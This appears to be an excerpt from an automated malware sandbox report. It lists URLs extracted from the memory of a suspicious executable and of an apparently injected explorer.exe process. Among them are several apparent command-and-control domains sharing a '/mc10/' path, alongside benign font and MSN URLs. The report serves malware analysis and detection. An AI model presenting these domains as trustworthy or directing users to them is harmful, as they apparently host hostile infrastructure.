          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajansyapai.netReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.at89v2.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.at89v2.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.at89v2.com/mc10/www.sainikshiksha.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.at89v2.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.basedawgz.live
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.basedawgz.live/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.basedawgz.live/mc10/www.thecollisionmagazine.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.basedawgz.liveReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bjcysadz.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bjcysadz.xyz/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bjcysadz.xyz/mc10/www.zaki-argan.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bjcysadz.xyzReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.com/mc10/www.bjcysadz.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dealerxai.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyz/mc10/www.huttonsidel.online
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fondsa.xyzReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.online/mc10/www.llngx.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huttonsidel.onlineReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/mc10/www.291van.fun
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.com/mc10/www.ajansyapai.net
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.llngx.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.com/mc10/www.at89v2.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motolimod.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.com/mc10/www.fondsa.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sainikshiksha.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703686104.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comne
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.com/mc10/:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shophansler.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tatesfluffyfrenchies.comReferer:
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.com/mc10/www.kurainu.xyz
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecollisionmagazine.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com/mc10/
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.com/mc10/www.shophansler.com
          Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaki-argan.comReferer:
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000004.00000000.1707756779.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000004.00000000.1701959899.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4142165391.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1702684644.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000003.3114554074.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000003.3114554074.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
